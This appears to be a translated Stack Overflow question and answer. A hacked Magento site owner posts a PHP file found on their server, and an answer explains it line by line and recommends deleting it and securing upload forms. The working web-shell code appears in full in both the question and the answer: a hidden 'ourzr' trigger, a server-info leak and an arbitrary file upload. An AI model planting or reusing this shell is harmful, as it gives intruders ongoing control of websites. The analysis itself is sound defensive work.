我的Magento网站被黑了,这个php代码做了什么?

时间:2015-06-30 19:18:36

标签: php magento

我刚刚在我的托管上发现了一些php文件,在php中有0.01%的知识,有人可以解释一下这段代码的作用吗?

<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

1 个答案:

答案 0 :(得分:11)

代码细分:

如果查询字符串中的变量具有值(即index.php?ourzr=set

<?php 
   if(isset($_GET["ourzr"])){

然后使用函数php_uname()显示有关服务器操作系统的信息。他们使用此信息将下一轮攻击定位到您的系统细节。

echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";

创建一个允许上传更多黑客文件的html表单

         echo"<form method=post enctype=multipart/form-data>";
         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";

如果文件已上传,请将文件从临时文件夹复制到普通文件夹,不带临时名称但原始名称

     if($_POST["v"]==up){
             if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                    echo"<b>sucess</b>-->".$_FILES["f"]["name"];
                }else{
                    echo"<b>failed</b>";
                }
          }
      }
?>

这部分只是一个小小的消息,说“我是来自歹徒队员的kool脚本小子”

<title>Hacked by d3b~X</title>
                            <center>
                                <div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
    <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

结论:

尽快删除此文件

此脚本以某种方式通过可能仍然存在的漏洞上传到您的服务器(除非黑客足够好以便为您修复)。

他们发现将这一个文件放在您可以访问它的服务器上,现在他们想用它来继续上传脚本和其他恶意数据。删除此文件,并查看网站上传任何类型文件的任何位置。

后续步骤:

了解黑客如何使用文件上传来上传这些脚本,以及他们可以使用自己的上传表单执行的其他操作: https://www.acunetix.com/websitesecurity/upload-forms-threat/

了解如何创建安全上传脚本:There are many other tutorials

阅读有关安全性的更多信息,并尝试学习一些PHP。如果您有任何更具体的问题,请告诉我

我猜这个家伙:https://twitter.com/d3b_x